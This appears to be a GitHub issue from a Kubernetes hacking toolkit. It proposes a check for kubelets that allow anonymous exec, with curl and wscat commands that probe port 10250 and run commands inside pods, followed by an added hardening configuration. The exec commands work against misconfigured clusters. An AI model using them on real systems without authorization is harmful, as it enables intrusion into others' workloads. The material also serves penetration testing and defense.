ProfessionallyEvil / harpoon

A collection of scripts, and tips and tricks for hacking k8s clusters and containers.
MIT License
134 stars 35 forks

Add check for kubelet exec capabilities #2

Open corysabol opened 6 years ago

corysabol commented 6 years ago

harpoon kube-exec -h https://<node-ip | node-domain> [-p 10250] [-e command]

If -e is given, then if the preliminary checks pass, harpoon will try to exploit the misconfiguration. This attack only works if you can route to the node API. So, you either have to be on the same network, or it happens to be publicly routable.

Check (verify/come up with a better check)

[[ "$(curl --insecure -s "https://<node>:10250/pods" 2>/dev/null | head -c 2)" == '{"' ]] && echo Match

Execute command

curl --insecure -v -H "Upgrade: WebSocket" -H "Connection: Upgrade" -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1"

Stream results

wscat -c "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1" --no-check
corysabol commented 6 years ago

As it turns out we don't actually need to do the second step. We can just make a websockets request to the endpoint from the get go and have command execution.

corysabol commented 6 years ago

(screenshot attached to the comment; not included here)

corysabol commented 6 years ago

Easier way: curl --insecure -s https://127.0.0.1:10250/run/default/kublet-name-here/nginx/ -d "cmd=ls"
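For reference on the defensive side (an added example, not part of this issue or of the harpoon project): the condition every command in this thread depends on is a kubelet that accepts anonymous requests and authorizes them with AlwaysAllow. The KubeletConfiguration below shows that weak setting beside the hardened form; the clientCAFile path is an assumed placeholder.

```yaml
# Added example, not from the harpoon project: the kubelet configuration under
# which the /pods, /exec and /run requests in this issue succeed, followed by
# the hardened form. The CA path below is an assumed placeholder.

# --- Weak: anyone who can reach :10250 can list pods and exec into them ---
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: true        # unauthenticated callers become system:anonymous ...
authorization:
  mode: AlwaysAllow      # ... and every request from them is permitted
---
# --- Hardened: anonymous off, client certs or bearer tokens required, and
# each request authorized via a SubjectAccessReview against the API server ---
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: false
  x509:
    clientCAFile: /etc/kubernetes/pki/ca.crt   # assumed path; cluster CA
  webhook:
    enabled: true
authorization:
  mode: Webhook
readOnlyPort: 0          # also close the unauthenticated read-only port
```

With the hardened form the requests shown in this thread are rejected with 401 Unauthorized, so the /pods check no longer matches; the same settings correspond to the kubelet flags --anonymous-auth=false, --authorization-mode=Webhook and --client-ca-file.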